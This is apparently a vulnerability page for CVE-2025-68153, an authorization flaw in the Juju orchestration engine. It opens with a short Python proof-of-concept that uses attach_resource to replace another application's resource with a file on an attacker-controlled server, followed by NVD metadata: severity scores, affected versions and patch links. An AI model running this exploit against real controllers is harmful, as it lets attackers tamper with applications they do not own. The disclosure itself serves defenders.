CVE-2025-68153

import asyncio from juju import jasyncio from juju.model import Model # PoC for CVE-2025-68153: Juju Resource Modification Vulnerability # This script demonstrates how an authenticated user can modify resources # of an application they do not own. async def exploit(): model = Model() # Connect to the vulnerable controller await model.connect("admin/controller.local") # Target application name (resource to be modified) target_app = "target-application-name" # New malicious resource URI malicious_resource_uri = "http://attacker-controlled-server/bad-resource.zip" print(f"[*] Attempting to modify resources for application: {target_app}") try: app = model.applications.get(target_app) # In vulnerable versions, an authenticated user can attach/modify resources # for any application on the controller without ownership checks. await app.attach_resource("resource-name", malicious_resource_uri) print("[+] Exploit successful! Application resource has been modified.") except Exception as e: print(f"[-] Exploit failed or patch applied: {e}") finally: await model.disconnect() if __name__ == "__main__": jasyncio.run(exploit())

{"cve": {"id": "CVE-2025-68153", "sourceIdentifier": "[email protected]", "published": "2026-04-03T16:16:23.357", "lastModified": "2026-04-21T01:24:01.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Juju is an open source application orchestration engine that enables any application operation on any infrastructure at any scale through special operators called ‘charms’. From versions 2.9 to before 2.9.56 and 3.6 to before 3.6.19, any authenticated user, machine or controller under a Juju controller can modify the resources of an application within the entire controller. This issue has been patched in versions 2.9.56 and 3.6.19."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.9", "versionEndIncluding": "2.9.55", "matchCriteriaId": "E0EAA4DD-F373-4A67-B571-D3899E1E13CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6", "versionEndIncluding": "3.6.18", "matchCriteriaId": "6EDFE9C5-AB90-4FA2-84FF-C005BE2B6D6F"}]}]}], "references": [{"url": "https://github.com/juju/juju/commit/26ff93c903d55b0712c6fb3f6b254710edb971d4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/juju/juju/security/advisories/GHSA-245v-p8fj-vwm2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}